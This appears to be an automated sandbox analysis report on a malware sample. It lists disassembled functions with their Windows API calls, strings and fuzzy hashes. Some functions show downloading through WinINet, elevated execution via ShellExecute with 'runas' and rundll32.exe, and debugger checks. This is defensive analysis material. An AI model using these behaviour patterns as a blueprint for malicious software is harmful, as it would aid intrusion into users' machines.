                                                                    • Associated: 00000013.00000002.542557474.00000000013C0000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542654955.00000000013F2000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542672420.00000000013FA000.00000080.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544742991.00000000017BC000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544760697.00000000017BE000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544823832.00000000017FC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544860931.000000000184A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544880918.000000000185A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544901329.000000000186D000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545013443.0000000001932000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545066960.0000000001933000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545093920.0000000001934000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545113705.0000000001935000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545169551.0000000001939000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545221321.000000000193A000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545430756.0000000001947000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545671110.0000000001C20000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                    • String ID:
                                                                    • API String ID: 3906539128-0
                                                                    • Opcode ID: 1e7f3d5da343d2c28c557f32d020d257040485bb8ee38395bfdb187586fe757d
                                                                    • Instruction ID: 0b7affcc0aa7c6bf8ad6575c7098452918f70e172be7fe2f96a8844aba672162
                                                                    • Opcode Fuzzy Hash: 1e7f3d5da343d2c28c557f32d020d257040485bb8ee38395bfdb187586fe757d
                                                                    • Instruction Fuzzy Hash: F631C5B5901219ABCB21DF28D8887DCBBF8BF18714F5041EAE40CA7291E7709F858F45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013D1541, Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(013C4ED2,?,013D1540,013C4ED2,?,013C4ED2,013C4ED2,013C4ED2,00000000), ref: 013D1563
                                                                    • TerminateProcess.KERNEL32(00000000,?,013D1540,013C4ED2,?,013C4ED2,013C4ED2,013C4ED2,00000000), ref: 013D156A
                                                                    • ExitProcess.KERNEL32 ref: 013D157C
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.542573036.00000000013C1000.00000040.00020000.sdmp, Offset: 013C0000, based on PE: true
                                                                    • Associated: 00000013.00000002.542557474.00000000013C0000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542654955.00000000013F2000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542672420.00000000013FA000.00000080.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544742991.00000000017BC000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544760697.00000000017BE000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544823832.00000000017FC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544860931.000000000184A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544880918.000000000185A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544901329.000000000186D000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545013443.0000000001932000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545066960.0000000001933000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545093920.0000000001934000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545113705.0000000001935000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545169551.0000000001939000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545221321.000000000193A000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545430756.0000000001947000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545671110.0000000001C20000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Process$CurrentExitTerminate
                                                                    • String ID:
                                                                    • API String ID: 1703294689-0
                                                                    • Opcode ID: 37b13ef7e937c5b2b5f83e198fc61ba15342ca08ef5518d39123bf1806748c71
                                                                    • Instruction ID: b0df8cf6c42771bc1bb3123bfbfaebb8d1c3be08cf4058667812c80376c09026
                                                                    • Opcode Fuzzy Hash: 37b13ef7e937c5b2b5f83e198fc61ba15342ca08ef5518d39123bf1806748c71
                                                                    • Instruction Fuzzy Hash: 53E0E673400208EFCF326F58ED09A4D3FAEEB51395F444514F5068A161DB39ED91CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013D4CD2, Relevance: .0, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.542573036.00000000013C1000.00000040.00020000.sdmp, Offset: 013C0000, based on PE: true
                                                                    • Associated: 00000013.00000002.542557474.00000000013C0000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542654955.00000000013F2000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542672420.00000000013FA000.00000080.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544742991.00000000017BC000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544760697.00000000017BE000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544823832.00000000017FC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544860931.000000000184A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544880918.000000000185A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544901329.000000000186D000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545013443.0000000001932000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545066960.0000000001933000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545093920.0000000001934000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545113705.0000000001935000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545169551.0000000001939000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545221321.000000000193A000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545430756.0000000001947000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545671110.0000000001C20000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e0ad719187851a61f309ddbb2cee80a5110ae42387cecf94a10a94091515ac20
                                                                    • Instruction ID: 9fa92e7612c15b07a346feb1de29026026fa3bbfbbcbd655a616daa66362d163
                                                                    • Opcode Fuzzy Hash: e0ad719187851a61f309ddbb2cee80a5110ae42387cecf94a10a94091515ac20
                                                                    • Instruction Fuzzy Hash: EEE08C73922238EBCB14DBCCD90498AF7FCEB48A04B110096BA01D3100C274DF00C7D0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013C2430, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 136networkfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 013C24D1
                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 013C24E3
                                                                    • InternetReadFile.WININET(00000000,?,?,?), ref: 013C24FA
                                                                    • InternetCloseHandle.WININET(00000000), ref: 013C250B
                                                                    • InternetCloseHandle.WININET(00000000), ref: 013C250E
                                                                    • InternetCloseHandle.WININET(00000000), ref: 013C251F
                                                                    • InternetCloseHandle.WININET(00000000), ref: 013C2522
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.542573036.00000000013C1000.00000040.00020000.sdmp, Offset: 013C0000, based on PE: true
                                                                    • Associated: 00000013.00000002.542557474.00000000013C0000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542654955.00000000013F2000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542672420.00000000013FA000.00000080.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544742991.00000000017BC000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544760697.00000000017BE000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544823832.00000000017FC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544860931.000000000184A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544880918.000000000185A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544901329.000000000186D000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545013443.0000000001932000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545066960.0000000001933000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545093920.0000000001934000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545113705.0000000001935000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545169551.0000000001939000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545221321.000000000193A000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545430756.0000000001947000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545671110.0000000001C20000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Internet$CloseHandle$Open$FileRead
                                                                    • String ID: <$Microsoft Internet Explorer$runas
                                                                    • API String ID: 4294395943-436926838
                                                                    • Opcode ID: 3fa2793b756d18fdce55928e92051df8619f2fa3c70a4860bcae2b338620047a
                                                                    • Instruction ID: 81b87eb05b77352bed7d741969eeda2dd7cd2484b5c2bdc7ec7e67c59d6f1e81
                                                                    • Opcode Fuzzy Hash: 3fa2793b756d18fdce55928e92051df8619f2fa3c70a4860bcae2b338620047a
                                                                    • Instruction Fuzzy Hash: 7B41E471E10219EBDB18DF68CC81BAFFBBAEF54704F10845DE512A7281DB34AA41CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013CFDC0, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 168COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _ValidateLocalCookies.LIBCMT ref: 013CFDF7
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 013CFDFF
                                                                    • _ValidateLocalCookies.LIBCMT ref: 013CFE88
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 013CFEB3
                                                                    • _ValidateLocalCookies.LIBCMT ref: 013CFF08
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.542573036.00000000013C1000.00000040.00020000.sdmp, Offset: 013C0000, based on PE: true
                                                                    • Associated: 00000013.00000002.542557474.00000000013C0000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542654955.00000000013F2000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542672420.00000000013FA000.00000080.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544742991.00000000017BC000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544760697.00000000017BE000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544823832.00000000017FC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544860931.000000000184A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544880918.000000000185A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544901329.000000000186D000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545013443.0000000001932000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545066960.0000000001933000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545093920.0000000001934000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545113705.0000000001935000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545169551.0000000001939000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545221321.000000000193A000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545430756.0000000001947000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545671110.0000000001C20000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: csm$csm
                                                                    • API String ID: 1170836740-3733052814
                                                                    • Opcode ID: 32a35656abc5d0f59dca7a258008ea9f5439bb82ad2f9e2918628fa42557770e
                                                                    • Instruction ID: 818d8da4c1101047b78c7684516d9c8570477b7f8f39edb5d363c4153644dc7c
                                                                    • Opcode Fuzzy Hash: 32a35656abc5d0f59dca7a258008ea9f5439bb82ad2f9e2918628fa42557770e
                                                                    • Instruction Fuzzy Hash: 0451C131A0020A9FDF24DF6CC844AAE7BAAEF45B18F14819DE9195B392C771DE05CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013D5F1C, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.542573036.00000000013C1000.00000040.00020000.sdmp, Offset: 013C0000, based on PE: true
                                                                    • Associated: 00000013.00000002.542557474.00000000013C0000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542654955.00000000013F2000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542672420.00000000013FA000.00000080.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544742991.00000000017BC000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544760697.00000000017BE000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544823832.00000000017FC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544860931.000000000184A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544880918.000000000185A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544901329.000000000186D000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545013443.0000000001932000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545066960.0000000001933000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545093920.0000000001934000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545113705.0000000001935000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545169551.0000000001939000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545221321.000000000193A000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545430756.0000000001947000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545671110.0000000001C20000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: api-ms-$ext-ms-
                                                                    • API String ID: 0-537541572
                                                                    • Opcode ID: 4461b957c8a6d525c44800ee1c7f29dbf7e47661edf4994e6d0c958f4f217491
                                                                    • Instruction ID: 2cbea90eb856d5fbb79ac8f1e9922174c7d13f4eaf2ea864ebd13fb92d7d52d7
                                                                    • Opcode Fuzzy Hash: 4461b957c8a6d525c44800ee1c7f29dbf7e47661edf4994e6d0c958f4f217491
                                                                    • Instruction Fuzzy Hash: 6621AB73A45325EBDB324A28FC85B2A7A7C9B51778F1505A0FD56AF2C1D630ED0487D0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013D7248, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetConsoleCP.KERNEL32(?,?,?), ref: 013D7290
                                                                    • __fassign.LIBCMT ref: 013D746F
                                                                    • __fassign.LIBCMT ref: 013D748C
                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 013D74D4
                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 013D7514
                                                                    • GetLastError.KERNEL32 ref: 013D75C0
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.542573036.00000000013C1000.00000040.00020000.sdmp, Offset: 013C0000, based on PE: true
                                                                    • Associated: 00000013.00000002.542557474.00000000013C0000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542654955.00000000013F2000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542672420.00000000013FA000.00000080.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544742991.00000000017BC000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544760697.00000000017BE000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544823832.00000000017FC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544860931.000000000184A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544880918.000000000185A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544901329.000000000186D000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545013443.0000000001932000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545066960.0000000001933000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545093920.0000000001934000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545113705.0000000001935000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545169551.0000000001939000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545221321.000000000193A000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545430756.0000000001947000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545671110.0000000001C20000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                    • String ID:
                                                                    • API String ID: 4031098158-0
                                                                    • Opcode ID: 2d479c4b26ef761c3c932698b94c65bb210c22ab7f94a591f1203fe356ae367d
                                                                    • Instruction ID: 602e1562a0b6e7a60f7ee3587707e6dfac3aa702196900d2cb99a5e91dea3466
                                                                    • Opcode Fuzzy Hash: 2d479c4b26ef761c3c932698b94c65bb210c22ab7f94a591f1203fe356ae367d
                                                                    • Instruction Fuzzy Hash: BBD1B072D00299DFDF15CFE8E8809EDBBB6BF49318F28015AE855BB245D7309946CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013D1583, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,013D1578,013C4ED2,?,013D1540,013C4ED2,?,013C4ED2), ref: 013D1598
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 013D15AB
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,013D1578,013C4ED2,?,013D1540,013C4ED2,?,013C4ED2), ref: 013D15CE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.542573036.00000000013C1000.00000040.00020000.sdmp, Offset: 013C0000, based on PE: true
                                                                    • Associated: 00000013.00000002.542557474.00000000013C0000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542654955.00000000013F2000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542672420.00000000013FA000.00000080.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544742991.00000000017BC000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544760697.00000000017BE000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544823832.00000000017FC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544860931.000000000184A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544880918.000000000185A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544901329.000000000186D000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545013443.0000000001932000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545066960.0000000001933000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545093920.0000000001934000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545113705.0000000001935000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545169551.0000000001939000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545221321.000000000193A000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545430756.0000000001947000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545671110.0000000001C20000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: 32f387b8e255cb0baef9e420ad5940ae300296358a844696bf912f0c2c606bb6
                                                                    • Instruction ID: cce8cc969e474a936cae684d643a29392a0e55d75a02505296de2dfeceadd6fe
                                                                    • Opcode Fuzzy Hash: 32f387b8e255cb0baef9e420ad5940ae300296358a844696bf912f0c2c606bb6
                                                                    • Instruction Fuzzy Hash: FDF0F872604328FBEB219B95EC0AB9D7FBAEB5075AF540064F502A6194CB748F05DB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013E01F5, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WriteConsoleW.KERNEL32(?,?,?,00000000,?,?,013DD695,?,00000001,?,?,?,013D761D,?,?,?), ref: 013E020C
                                                                    • GetLastError.KERNEL32(?,013DD695,?,00000001,?,?,?,013D761D,?,?,?,?,?,?,013D7B71,?), ref: 013E0218
                                                                      • Part of subcall function 013E01DE: CloseHandle.KERNEL32(FFFFFFFE,013E0228,?,013DD695,?,00000001,?,?,?,013D761D,?,?,?,?,?), ref: 013E01EE
                                                                    • ___initconout.LIBCMT ref: 013E0228
                                                                      • Part of subcall function 013E01A0: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,013E01CF,013DD682,?,?,013D761D,?,?,?,?), ref: 013E01B3
                                                                    • WriteConsoleW.KERNEL32(?,?,?,00000000,?,013DD695,?,00000001,?,?,?,013D761D,?,?,?,?), ref: 013E023D
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.542573036.00000000013C1000.00000040.00020000.sdmp, Offset: 013C0000, based on PE: true
                                                                    • Associated: 00000013.00000002.542557474.00000000013C0000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542654955.00000000013F2000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542672420.00000000013FA000.00000080.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544742991.00000000017BC000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544760697.00000000017BE000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544823832.00000000017FC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544860931.000000000184A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544880918.000000000185A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544901329.000000000186D000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545013443.0000000001932000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545066960.0000000001933000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545093920.0000000001934000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545113705.0000000001935000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545169551.0000000001939000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545221321.000000000193A000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545430756.0000000001947000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545671110.0000000001C20000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                    • String ID:
                                                                    • API String ID: 2744216297-0
                                                                    • Opcode ID: 904997769226997b4bf3fbf9b7f3abe7d166c18ee04a9d914d54ff1ea6cbab61
                                                                    • Instruction ID: 117f6a6bf6b6f930438393322dc74df78b74c99e1960f05224d901d1de513d47
                                                                    • Opcode Fuzzy Hash: 904997769226997b4bf3fbf9b7f3abe7d166c18ee04a9d914d54ff1ea6cbab61
                                                                    • Instruction Fuzzy Hash: D7F01C36100339BBCF322FA5DC09A893FEBFB493A5F004014FA6D991A4C77299209B91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013C2A20, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 295COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ShellExecuteA.SHELL32(00000000,?,?,?,00000000,00000000), ref: 013C2A8D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.542573036.00000000013C1000.00000040.00020000.sdmp, Offset: 013C0000, based on PE: true
                                                                    • Associated: 00000013.00000002.542557474.00000000013C0000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542654955.00000000013F2000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542672420.00000000013FA000.00000080.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544742991.00000000017BC000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544760697.00000000017BE000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544823832.00000000017FC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544860931.000000000184A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544880918.000000000185A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544901329.000000000186D000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545013443.0000000001932000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545066960.0000000001933000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545093920.0000000001934000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545113705.0000000001935000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545169551.0000000001939000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545221321.000000000193A000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545430756.0000000001947000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545671110.0000000001C20000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ExecuteShell
                                                                    • String ID: runas$rundll32.exe
                                                                    • API String ID: 587946157-4081450877
                                                                    • Opcode ID: 270f8f63895698ec28430009edd9bc5d9c1fd48777c940e66f14ac987de98a3f
                                                                    • Instruction ID: 1a36656b9c4a456865611b969abd6abf7fde573185e1e0ed5509b49bf13fe306
                                                                    • Opcode Fuzzy Hash: 270f8f63895698ec28430009edd9bc5d9c1fd48777c940e66f14ac987de98a3f
                                                                    • Instruction Fuzzy Hash: 30A13531610109AFEB08DF2CCC85B9EBB6AEF95708F64851CF8158B285D739DE81CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%